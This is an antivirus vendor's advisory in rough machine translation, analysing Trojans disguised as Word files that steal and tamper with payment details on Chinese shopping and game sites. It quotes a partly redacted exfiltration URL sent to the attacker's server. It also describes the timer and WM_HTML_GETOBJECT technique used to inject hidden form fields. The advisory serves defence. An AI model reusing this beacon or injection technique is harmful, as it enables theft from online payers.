The end of the season, the annual promotional frenzy is also coming, the major online shopping site to display all the tricks to attract customers. According to the latest data show: Only the domestic famous online shopping platform Taobao launched on December 12, the nationwide crazy Rob activities, within one hours, the turnover reached 475 million, turnover 2.78 million pens. Dazzling promotional means to attract not only a lot of online shoppers, but also attracted a lot of hackers eyes. In the recent period, AVG China Virus Laboratory intercepted a large number of domestic payment platform for the virus, including: Hundred, Sheng, fast money, news, Yi Bao, Alipay and so on. At the same time the scope has been expanded, in addition to online shopping sites, some game companies recharge sites in this category of Trojan attack range, such as: perfect, more play, 4399 network games, Journey games and so on. Most of these Trojans are generated by some kind of generator, and the Trojan author provides the backstage management system.
There is no obvious change in the way this virus is transmitted, mostly by using social engineering to disguise it as Word documents, picture files, or text files that induce users to click. The main means of the attack is to steal the user's payment account password, modify the user's payment account. Let's take a closer approach to this kind of Trojan and uncover its mystery.
Most of the samples currently intercepted have icons for Word documents. This type of file may be in the form of a mail attachment, or it may be the seller sending the product information. In the process of running this kind of Trojan will first connect to Baidu, to determine the current network situation. Then connect to the server in the background of the virus. The request is made in the form of the following:
Http://119.***.***.48:858/api/163/post.php? username=aucodehu&bank=icbc&money=88 (link already processed)
Through the above user name and bank information, can be managed and the spoils. Then the Trojan will simply collect information about the system and then send it to the same backend system.
Includes the native IP, operating system version, and geographic location.
After the preparation of the above activities, the Trojan began to monitor the user's Web site, different from the previous code injection, or hijacking the API, and so on, such Trojans use a more simple and effective method: Timer. This approach may be overlooked by some active defenses. This kind of Trojan generally set up three or more timers. The time interval that is triggered is 200 milliseconds. This time interval is sufficient to monitor the user's actions on the site. One of the timers, through GetCursorPos, gets the current mouse position and then gets the handle to the current window. The IHTMLDocument object is then obtained by sending a wm_html_getobject message to the WebBrowser control (the window class name is "Internet explorer_server"). After you get this object, the Trojan author can do anything about the page: parse the page element, steal any content that interests you, tamper with payment information, and so on, the following is a fragment of a string that was intercepted in the virus:
It also adds some hidden labels to the page, which are not displayed on the page, but are the ones that really work:
Once you click Submit, the hidden content in these pages will be submitted, and the user will be faced with information theft and property loss. Meanwhile, the virus also sets up other timers. Used to close the payment site to the user environment check and the user failed to pay the page.
For this kind of Trojan prevention, should pay attention to the following points:
1. Keep anti-virus software updated in time.
2. Do not open any documents not on your own initiative.
3. Check that the file type is consistent with the icon and suffix.
4. Online shopping If you find any user to pay the Environment check the page is closed, immediately stop paying.
5. Check whether the payment page has been modified.
AVG has been able to detect this type of virus, users can effectively prevent the attack if they do not turn off the update and keep the virus library in the current state. At the same time, the AVG China Laboratory to remind the vast number of netizens, the end of a variety of network virus outbreak of high-risk period, usually online surfing especially involved in property transactions must be cautious and cautious.